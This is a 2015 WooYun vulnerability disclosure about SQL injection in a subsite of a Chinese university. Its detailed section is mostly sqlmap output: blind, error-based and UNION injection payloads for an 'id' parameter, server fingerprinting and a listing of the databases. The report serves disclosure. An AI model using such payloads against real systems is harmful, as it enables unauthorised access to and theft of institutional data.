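Vulnerability summary
Bug ID: wooyun-2015-0152574
Title: SQL injection in a subsite of South-Central University for Nationalities (中南民族大学)
Vendor: CCERT Education Network Emergency Response Team
Author: 龍 、
Submitted: 2015-11-09 14:26
Fixed: 2015-11-22 11:18
Published: 2015-11-22 11:18
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: handed over to a third-party partner organization (CCERT Education Network Emergency Response Team) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-11-09: Details reported to the vendor; awaiting vendor handling
2015-11-22: The vendor has chosen to ignore the vulnerability; details disclosed to the public
Brief description: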
RT
Detailed description:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=184 AND 9426=9426
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=184 AND (SELECT 7771 FROM(SELECT COUNT(*),CONCAT(0x7173636d71,(SELECT (CASE WHEN (7771=7771) THEN 1 ELSE 0 END)),0x716e617071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-2694 UNION ALL SELECT NULL,CONCAT(0x7173636d71,0x4b447362455959464a75,0x716e617071),NULL,NULL,NULL,NULL,NULL#
---
[14:13:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] smkx
Proof of vulnerability:
Database: smkx
[144 tables]
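Fix:
Copyright notice: when reposting, please credit the source 龍 、@WooYun
Vulnerability response
Vendor response:
Severity: no impact, ignored by vendor
Ignored at: 2015-11-22 11:18
Vendor reply:
Latest status:
None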